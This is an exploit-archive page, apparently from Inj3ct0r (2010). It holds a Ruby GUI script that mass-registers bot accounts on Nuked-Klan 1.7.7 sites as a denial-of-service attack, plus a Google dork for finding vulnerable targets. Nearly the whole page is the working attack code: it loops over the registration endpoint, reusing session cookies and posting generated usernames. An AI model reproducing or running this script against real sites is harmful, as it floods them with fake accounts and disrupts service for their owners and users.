Home / exploitsPDF  

Nuked-Klan 1.7.7 Mass Register & Denial Of Service

Posted on 23 April 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Nuked-Klan 1.7.7 Mass Register &amp; Denial Of Service</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================== Nuked-Klan 1.7.7 Mass Register &amp; Denial Of Service ================================================== # usr/bin/env Ruby # Mass Register, Denial Of Service Attack On Nuked-Klan 1.7.7 # 23/04/10 # Code By, Whivack and thanks at &quot;Gsk? | Callo&quot; for help and &quot;Gsk? | Alg3ri4n&quot; for idea # ActiveTcl 8.4 and Ruby 1.8.6 # V 2.0 GUI # WebApps/0day # Dork Google By Gsk? | Callo : &quot;Powered by Nuked-Klan 1.7.7 ? 2002, 2008&quot; # Contact Me At : whivackandninpa@gmail.com # Visit http://gsk2.org/ require 'net/http' require 'net/https' require 'tk' root = TkRoot.new { ? title &quot;Code, By Whivack&quot; } TkLabel.new( root ) { text &quot;Website :&quot; pack( {'padx' =&gt; 10, 'pady' =&gt; 10} ) } site = TkEntry.new( root ) { pack( { &quot;side&quot; =&gt; &quot;top&quot; } ) } TkLabel.new( root ) { text &quot;Number Register : &lt; 100&quot; pack( {'padx' =&gt; 10, 'pady' =&gt; 10} ) } nbr = TkEntry.new( root ) { pack( { &quot;side&quot; =&gt; &quot;top&quot; } ) } TkLabel.new( root ) { text &quot;Bot Name :&quot; pack( {'padx' =&gt; 10, 'pady' =&gt; 10} ) } pseudo = TkEntry.new( root ) { pack( { &quot;side&quot; =&gt; &quot;top&quot; } ) } attack = TkButton.new( root ) { ? text &quot;Send&quot; ? pack( { &quot;side&quot; =&gt; &quot;bottom&quot; } ) } TkLabel.new( root ) { text &quot;Code By Whivack, Thanks Gsk? | Alg3ri4n For Idea And Gsk? | Callo For Help&quot; pack( {'padx' =&gt; 10, 'pady' =&gt; 10} ) } var = 0 nombre = TkVariable.new pseu = TkVariable.new nbr.textvariable = nombre pseudo.textvariable = pseu cible = TkVariable.new site.textvariable = cible attack.bind( &quot;1&quot;, proc { while var &lt; nombre ? var +=1 http = Net::HTTP.new(&quot;#{cible}&quot;, 80) http.use_ssl = false path = '/index.php?file=User&amp;op=reg' resp, data = http.get(path, nil) cookie = resp.response['set-cookie'] pse = &quot;#{pseu}&quot; + &quot;#{var}&quot; data = &quot;pseudo=#{pse}&amp;pass_reg=test&amp;pass_conf=test&amp;mail=#{pse}@gmail.fr&amp;email=&amp;country=France.gif&amp;game=1&quot; headers = { ? 'Cookie' =&gt; cookie, ? 'Referer' =&gt; &quot;http://#{cible}/index.php&quot;, ? 'Content-Type' =&gt; 'application/x-www-form-urlencoded' } resp, data = http.post(path, data, headers) puts 'Code = ' + resp.code puts 'Message = ' + resp.message resp.each {|key, val| puts key + ' = ' + val} puts data end } ) Tk.mainloop # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-23]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP